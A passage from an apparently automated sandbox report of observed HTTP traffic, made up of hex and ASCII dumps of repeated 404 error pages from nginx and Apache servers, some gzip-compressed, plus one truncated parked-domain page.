68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 06:02:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 06:02:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 06:02:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 06:02:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 24 Oct 2024 06:02:56 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a 
Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 24 Oct 2024 06:02:58 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a 
Data Ascii (not meaningful as text: per the Transfer-Encoding and Content-Encoding headers above, the body is one chunk of size 0x239 holding a gzip member): 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 24 Oct 2024 06:03:01 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a 
Data Ascii (not meaningful as text: per the Transfer-Encoding and Content-Encoding headers above, the body is one chunk of size 0x239 holding a gzip member): 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Thu, 24 Oct 2024 06:03:03 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 
3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
Data Ascii (decoded here from the Data Raw hex; whitespace collapsed; the dump is truncated mid-script): <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> <!-- Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type=
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 06:03:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 